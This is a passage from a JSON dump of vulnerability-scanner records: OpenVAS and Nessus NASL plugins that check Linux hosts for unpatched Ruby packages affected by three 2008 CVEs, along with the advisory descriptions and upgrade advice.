(CVE-2008-3905)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. 
If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"irb on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015333.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880056\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0896\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_name( \"CentOS Update for irb CESA-2008:0896 centos3 x86_64\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = 
isrpmvuln(pkg:\"irb\", rpm:\"irb~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-09T11:41:18", "bulletinFamily": "scanner", "description": "Check for the Version of irb", "modified": "2018-04-06T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310880190", "id": "OPENVAS:1361412562310880190", "title": "CentOS Update for irb CESA-2008:0896 centos3 i386", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for irb CESA-2008:0896 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public 
License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Ruby is an interpreted scripting language for quick and easy\n object-oriented programming.\n\n The Ruby DNS resolver library, resolv.rb, used predictable transaction IDs\n and a fixed source port when sending DNS requests. A remote attacker could\n use this flaw to spoof a malicious reply to a DNS query. (CVE-2008-3905)\n \n A number of flaws were found in the safe-level restrictions in Ruby. It\n was possible for an attacker to create a carefully crafted malicious script\n that can allow the bypass of certain safe-level restrictions. (CVE-2008-3655)\n \n A denial of service flaw was found in Ruby's regular expression engine. 
If\n a Ruby script tried to process a large amount of data via a regular\n expression, it could cause Ruby to enter an infinite-loop and crash.\n (CVE-2008-3443)\n \n Users of ruby should upgrade to these updated packages, which contain\n backported patches to resolve these issues.\";\n\ntag_affected = \"irb on CentOS 3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2008-October/015332.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.880190\");\n script_version(\"$Revision: 9370 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 10:53:14 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 09:02:20 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_xref(name: \"CESA\", value: \"2008:0896\");\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_name( \"CentOS Update for irb CESA-2008:0896 centos3 i386\");\n\n script_tag(name:\"summary\", value:\"Check for the Version of irb\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"irb\", 
rpm:\"irb~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby\", rpm:\"ruby~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-devel\", rpm:\"ruby-devel~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-docs\", rpm:\"ruby-docs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-libs\", rpm:\"ruby-libs~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-mode\", rpm:\"ruby-mode~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ruby-tcltk\", rpm:\"ruby-tcltk~1.6.8~13.el3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:38:10", "bulletinFamily": "scanner", "description": "The remote host is missing an update to ruby1.8, ruby1.9\nannounced via advisory DSA 1695-1.", "modified": "2018-04-06T00:00:00", "published": "2009-01-07T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063099", "id": "OPENVAS:136141256231063099", "type": "openvas", "title": "Debian Security Advisory DSA 1695-1 (ruby1.8, ruby1.9)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1695_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1695-1 (ruby1.8, ruby1.9)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. 
http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The regular expression engine of Ruby, a scripting language, contains a\nmemory leak which can be triggered remotely under certain circumstances,\nleading to a denial of service condition (CVE-2008-3443).\n\nIn addition, this security update addresses a regression in the REXML\nXML parser of the ruby1.8 package; the regression was introduced in\nDSA-1651-1.\n\nFor the stable distribution (etch), this problem has been fixed in version\n1.8.5-4etch4 of the ruby1.8 package, and version 1.9.0+20060609-1etch4\nof the ruby1.9 package.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 1.8.7.72-1 of the ruby1.8 package. 
The ruby1.9 package will be\nfixed soon.\n\nWe recommend that you upgrade your Ruby packages.\";\ntag_summary = \"The remote host is missing an update to ruby1.8, ruby1.9\nannounced via advisory DSA 1695-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201695-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63099\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-01-07 23:16:01 +0100 (Wed, 07 Jan 2009)\");\n script_cve_id(\"CVE-2008-3443\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 1695-1 (ruby1.8, ruby1.9)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"ruby1.9-examples\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irb1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"rdoc1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ri1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != 
NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-elisp\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ri1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"rdoc1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"irb1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-elisp\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-examples\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libreadline-ruby1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libopenssl-ruby1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libdbm-ruby1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libopenssl-ruby1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgdbm-ruby1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.8-dev\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"ruby1.9-dev\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libreadline-ruby1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = 
isdpkgvuln(pkg:\"libdbm-ruby1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtcltk-ruby1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtcltk-ruby1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libgdbm-ruby1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.8-dbg\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.9\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.9-dbg\", ver:\"1.9.0+20060609-1etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libruby1.8\", ver:\"1.8.5-4etch4\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "nessus": [{"lastseen": "2019-11-01T03:20:19", "bulletinFamily": "scanner", "description": "Updated ruby packages that fix various security issues are now\navailable for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. 
(CVE-2008-3655)\n\nA denial of service flaw was found in Ruby", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2008-0895.NASL", "href": "https://www.tenable.com/plugins/nessus/34464", "published": "2008-10-22T00:00:00", "title": "RHEL 2.1 : ruby (RHSA-2008:0895)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2008:0895. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34464);\n script_version (\"1.24\");\n script_cvs_date(\"Date: 2019/10/25 13:36:13\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\");\n script_bugtraq_id(30644, 30682);\n script_xref(name:\"RHSA\", value:\"2008:0895\");\n\n script_name(english:\"RHEL 2.1 : ruby (RHSA-2008:0895)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated ruby packages that fix various security issues are now\navailable for Red Hat Enterprise Linux 2.1.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. 
(CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3443\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2008-3655\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2008:0895\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(264, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/10/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/10/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n 
script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2008-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^2\\.1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\nif (cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i386\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:0895\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", 
reference:\"irb-1.6.4-7.el2\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"ruby-1.6.4-7.el2\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"ruby-devel-1.6.4-7.el2\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"ruby-docs-1.6.4-7.el2\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"ruby-libs-1.6.4-7.el2\")) flag++;\n if (rpm_check(release:\"RHEL2.1\", cpu:\"i386\", reference:\"ruby-tcltk-1.6.4-7.el2\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"irb / ruby / ruby-devel / ruby-docs / ruby-libs / ruby-tcltk\");\n }\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:14:12", "bulletinFamily": "scanner", "description": "From Red Hat Security Advisory 2008:0896 :\n\nUpdated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. (CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. 
(CVE-2008-3655)\n\nA denial of service flaw was found in Ruby", "modified": "2019-11-02T00:00:00", "id": "ORACLELINUX_ELSA-2008-0896.NASL", "href": "https://www.tenable.com/plugins/nessus/67751", "published": "2013-07-12T00:00:00", "title": "Oracle Linux 3 : ruby (ELSA-2008-0896)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2008:0896 and \n# Oracle Linux Security Advisory ELSA-2008-0896 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(67751);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/10/25 13:36:07\");\n\n script_cve_id(\"CVE-2008-3443\", \"CVE-2008-3655\", \"CVE-2008-3905\");\n script_bugtraq_id(30644, 30682, 31699);\n script_xref(name:\"RHSA\", value:\"2008:0896\");\n\n script_name(english:\"Oracle Linux 3 : ruby (ELSA-2008-0896)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2008:0896 :\n\nUpdated ruby packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 3.\n\nThis update has been rated as having moderate security impact by the\nRed Hat Security Response Team.\n\nRuby is an interpreted scripting language for quick and easy\nobject-oriented programming.\n\nThe Ruby DNS resolver library, resolv.rb, used predictable transaction\nIDs and a fixed source port when sending DNS requests. A remote\nattacker could use this flaw to spoof a malicious reply to a DNS\nquery. 
(CVE-2008-3905)\n\nA number of flaws were found in the safe-level restrictions in Ruby.\nIt was possible for an attacker to create a carefully crafted\nmalicious script that can allow the bypass of certain safe-level\nrestrictions. (CVE-2008-3655)\n\nA denial of service flaw was found in Ruby's regular expression\nengine. If a Ruby script tried to process a large amount of data via a\nregular expression, it could cause Ruby to enter an infinite-loop and\ncrash. (CVE-2008-3443)\n\nUsers of ruby should upgrade to these updated packages, which contain\nbackported patches to resolve these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2008-October/000771.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(264, 287, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-docs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-mode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:ruby-tcltk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/08/12\");\n 
